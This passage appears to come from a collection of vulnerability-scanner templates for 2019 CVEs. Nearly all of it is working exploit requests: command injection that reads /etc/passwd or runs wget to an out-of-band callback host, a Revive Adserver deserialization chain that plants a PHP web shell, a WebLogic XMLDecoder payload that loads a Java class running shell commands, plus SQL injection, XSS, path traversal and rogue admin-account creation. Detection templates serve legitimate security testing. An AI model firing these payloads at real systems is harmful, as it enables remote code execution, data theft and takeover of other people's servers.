lbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void 